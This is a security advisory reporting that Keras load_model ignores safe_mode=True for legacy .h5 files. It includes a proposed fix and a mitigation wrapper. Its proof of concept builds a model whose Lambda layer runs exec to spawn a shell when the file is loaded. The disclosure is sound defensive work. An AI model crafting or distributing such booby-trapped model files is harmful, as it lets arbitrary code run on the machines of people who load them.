
GHSA-36rr-ww3j-vrjv: The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.

Note: This report has already been discussed with the Google OSS VRP team, who recommended that I reach out directly to the Keras team. I’ve chosen to do so privately rather than opening a public issue, due to the potential security implications. I also attempted to use the email address listed in your SECURITY.md, but received no response.


Summary

When a model in the .h5 (or .hdf5) format is loaded using the Keras Model.load_model method, the safe_mode=True setting is silently ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim’s machine with the same privileges as the Keras application. This report is specific to the .h5/.hdf5 file format. The attack works regardless of the other parameters passed to load_model and does not require any sophisticated technique—.h5 and .hdf5 files are simply not checked for unsafe code execution.

From this point on, I will refer only to the .h5 file format, though everything equally applies to .hdf5.

Details

Intended behaviour

According to the official Keras documentation, safe_mode is defined as:

safe_mode: Boolean, whether to disallow unsafe lambda deserialization. When safe_mode=False, loading an object has the potential to trigger arbitrary code execution. This argument is only applicable to the Keras v3 model format. Defaults to True.

I understand that the behavior described in this report is, to some extent, intentional, as safe_mode is only applicable to .keras models.

However, in practice, this behavior is misleading for users who are unaware of the internal Keras implementation. .h5 files can still be loaded seamlessly using load_model with safe_mode=True, and the absence of any warning or error creates a false sense of security. Whether intended or not, I believe silently ignoring a security-related parameter is not the best possible design decision. At a minimum, if safe_mode cannot be applied to a given file format, an explicit error should be raised to alert the user.

This issue is particularly critical given the widespread use of the .h5 format, despite the introduction of newer formats.

As a small anecdotal test, I asked several of my colleagues what they would expect when loading a .h5 file with safe_mode=True. None of them expected the setting to be silently ignored, even after reading the documentation. While this is a small sample, all of these colleagues are cybersecurity researchers—experts in binary or ML security—and regular participants in DEF CON finals. I was careful not to give any hints about the vulnerability in our discussion.

Technical Details

Examining the implementation of load_model in keras/src/saving/saving_api.py, we can see that the safe_mode parameter is completely ignored when loading .h5 files. Here’s the relevant snippet:

def load_model(filepath, custom_objects=None, compile=True, safe_mode=True):
    is_keras_zip = ...
    is_keras_dir = ...
    is_hf = ...

    # Support for remote zip files
    if (
        file_utils.is_remote_path(filepath)
        and not file_utils.isdir(filepath)
        and not is_keras_zip
        and not is_hf
    ):
        ...

    if is_keras_zip or is_keras_dir or is_hf:
        ...

    if str(filepath).endswith((".h5", ".hdf5")):
        return legacy_h5_format.load_model_from_hdf5(
            filepath, custom_objects=custom_objects, compile=compile
        )

As shown, when the file format is .h5 or .hdf5, the method delegates to legacy_h5_format.load_model_from_hdf5, which does not use or check the safe_mode parameter at all.
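This is easy to confirm from the loader's own signature. A quick check, assuming the Keras 3 source layout where the legacy loader lives at keras.src.legacy.saving.legacy_h5_format (the exact import path may differ between versions):

# Confirm that the legacy HDF5 loader has no notion of safe_mode at all.
# Assumes the Keras 3 layout (keras.src.legacy.saving.legacy_h5_format);
# the import path may vary between Keras versions.
import inspect

from keras.src.legacy.saving import legacy_h5_format

sig = inspect.signature(legacy_h5_format.load_model_from_hdf5)
print(sig)                            # no safe_mode parameter is exposed
print("safe_mode" in sig.parameters)  # False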

Solution

Now that the new .keras format is available, I believe the simplest and most effective way to address this misleading behavior, and to improve security in Keras, is to have load_model raise an explicit error when safe_mode=True is used with .h5/.hdf5 files. The error should be clear and informative, explaining that the legacy format does not support safe_mode and outlining the risks of loading such files.

I recognize this fix may have minor backward compatibility considerations.

If you confirm that you’re open to this approach, I’d be happy to open a PR that includes the missing check.
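For concreteness, here is a minimal sketch of what such a guard could look like in the .h5/.hdf5 branch of load_model. The wording and placement are illustrative only, not an actual Keras patch:

# Hypothetical guard in keras/src/saving/saving_api.py (illustrative only).
if str(filepath).endswith((".h5", ".hdf5")):
    if safe_mode:
        raise ValueError(
            "safe_mode=True is not supported for the legacy HDF5 format: "
            "loading '.h5'/'.hdf5' files can execute arbitrary code embedded "
            "in the model (e.g. via Lambda layers). Re-save the model in the "
            "'.keras' format, or pass safe_mode=False only if you fully trust "
            "the source of this file."
        )
    return legacy_h5_format.load_model_from_hdf5(
        filepath, custom_objects=custom_objects, compile=compile
    )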

PoC

From the attacker’s perspective, creating a malicious .h5 model is as simple as the following:

import keras

f = lambda x: (
    exec("import os; os.system('sh')"),
    x,
)

model = keras.Sequential()
model.add(keras.layers.Input(shape=(1,)))
model.add(keras.layers.Lambda(f))
model.compile()

keras.saving.save_model(model, "./provola.h5")

From the victim’s side, triggering code execution is just as simple:

import keras

model = keras.models.load_model("./provola.h5", safe_mode=True)

That’s all. The exploit occurs during model loading, with no further interaction required. The parameters passed to the method do not mitigate or influence the attack in any way.

As expected, the attacker can substitute the exec(...) call with any payload. Whatever command is used will execute with the same permissions as the Keras application.

Attack scenario

The attacker may distribute a malicious .h5/.hdf5 model on platforms such as Hugging Face, or act as a malicious node in a federated learning environment. The victim only needs to load the model; even safe_mode=True provides nothing more than the illusion of security. No inference or further action is required, making the threat particularly stealthy and dangerous.

Once the model is loaded, the attacker gains the ability to execute arbitrary code on the victim’s machine with the same privileges as the Keras process. The provided proof-of-concept demonstrates a simple shell spawn, but any payload could be delivered this way.
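Until such a check exists in Keras itself, a user-side mitigation is to refuse legacy formats before ever calling load_model. A minimal sketch follows; the wrapper name and policy are mine, not part of Keras:

import keras

def load_model_strict(filepath, **kwargs):
    # Reject legacy HDF5 files instead of letting safe_mode be silently ignored.
    if str(filepath).endswith((".h5", ".hdf5")):
        raise ValueError(
            f"Refusing to load {filepath!r}: the legacy HDF5 format can execute "
            "arbitrary code at load time and does not honor safe_mode."
        )
    return keras.models.load_model(filepath, safe_mode=True, **kwargs)

# load_model_strict("./model.keras")   # loads normally
# load_model_strict("./provola.h5")    # raises instead of spawning a shell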


References

  • GHSA-36rr-ww3j-vrjv
  • https://nvd.nist.gov/vuln/detail/CVE-2025-9905
  • keras-team/keras#21602
